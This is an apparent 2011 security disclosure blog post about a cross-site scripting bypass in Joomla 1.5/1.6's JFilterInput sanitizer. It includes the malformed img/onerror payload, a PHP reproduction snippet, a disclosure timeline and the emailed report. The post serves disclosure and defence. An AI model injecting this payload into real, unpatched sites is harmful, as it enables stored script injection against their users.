Tuesday, 01 February 2011 09:21

Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied html. This class attempts to parse any given string for html code, checks the code against a whitelist of elements and attributes, and strips out any code that is not allowed. However, malformed html code can be used to bypass the filter and inject XSS code into user-supplied input.

The following string bypasses JFilterInput's "safe" attributes in both 1.5 and 1.6:

<img src="<img src=x"/onerror=alert(1)//">

Users of 1.6 can test this by enabling the "Profile" user plugin and injecting this string into the "About Me" textarea. Joomla! 1.5 has no known core extensions that allow guests or regular users to post html, however any 3rd party extension that relies on this class to sanitize input will be vulnerable.

Timeline

  • Vulnerabilities Discovered: 15 January 2011
  • Vendor Notified: 15 January 2011
  • Vendor Response: 17 January 2011
  • Update Available: ...
  • Disclosure: 1 February 2011

Update

Since posting this, I've decided to go ahead and publish the email exchange... in all it's brevity. Some headers removed.

-------- Original Message --------
Return-path:    <
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 >
Envelope-to:    
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 
Delivery-date:  Mon, 17 Jan 2011 19:40:17 -0600
Date:   Tue, 18 Jan 2011 01:40:26 +0000
Subject:        Re: [#XNT-28157-847] JFilterInput XSS Bypass
From:   Joomla! Security Strike Team (JSST) <
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 >
To:     
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 



Thank you for your email regarding a new vulnerability. We will investigate this as quickly as we can to verify and confirm the details. Once this is completed we will evaluate the complexity and criticality to determine the necessary resources and timing to correct the issue.

Please note: We may contact you for additional details, and/or advise you of the outcome of our investigation.

If this ticket XNT-28157-847 is not replied to within 7 days of Tue, 18 Jan 2011 01:40:20 +0000, it will be automatically closed.



On Sat, 15 Jan 2011 19:38:20 +0000, jeff<
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 >  wrote:
>  The following string bypasses JFilterInput's "safe" attributes in both
>  1.5 and 1.6:
>
>  <img src="<img src=x"/onerror=alert(1)//">
>
>  Here's a quick way to reproduce: append the following somewhere in the
>  template:
>
>  <?php
>  $test = '<img src="x"/onerror=alert(1)//>'; // will be sanitized
>  $test .= '<img src="<img src=x"/onerror=alert(2)//">'; // will not be
>  sanitized
>  $filter =&  JFilterInput::getInstance(null, null, 1, 1);
>  echo $filter->clean($test);
>  ?>
>
>  The impact of this could be pretty wide, as any extension using this
>  method to sanitize user input is potentially vulnerable. One such
>  example is in 1.6 plg_user_profile "About Me" field.
>
>  TinyMCE will neuter this bypass if attempted in its html source editor
>  or by disabling via the ui button, but this is not a good remedy.

It was well over 7 days, so I guess I'm a jackass for assuming the ticket was closed?

Last Updated on Tuesday, 01 February 2011 19:02
 
Comments (2)
1 Sunday, 27 February 2011 07:31
Rahul Tyagi
That was really awesome but i dont think so that most people will make the best use of it. In India no one going to update soon. So still chance for hackers to search for the vulnerable non updated websites.
2 Thursday, 11 August 2011 15:36
Gogoman Jony
Thanks for the info....

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

Featured Extensions

$1.00
FREE
You Save: $1.00
FREE
$3.00
FREE
You Save: $3.00
$1.00
FREE
You Save: $1.00

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions